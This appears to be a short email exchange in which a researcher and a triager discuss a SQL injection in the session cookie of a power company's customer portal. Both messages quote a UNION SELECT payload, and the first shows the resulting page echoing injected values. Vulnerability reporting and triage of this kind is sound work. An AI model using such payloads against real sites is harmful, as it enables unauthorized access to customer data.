Hi,
This is the HTML from a manual request with sesh cookie set
to ')%20UNION%20select%201,2,3,4%20--%20
My Account - Customer Care Centre - Acme Power Co
Home / Login -
My Account -
Contact Support -
CCC
Opening Hours -
Logout;
Hi, 2! Have a token: 86a2
Hi Stephen.
From this traffic file it's not really clear if this is exploitable by any
means more than time-based.
Could you please send the response you get when you "manually exploit" it
with the payload you've mentioned:
"sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
Kind regards,
Miroslav St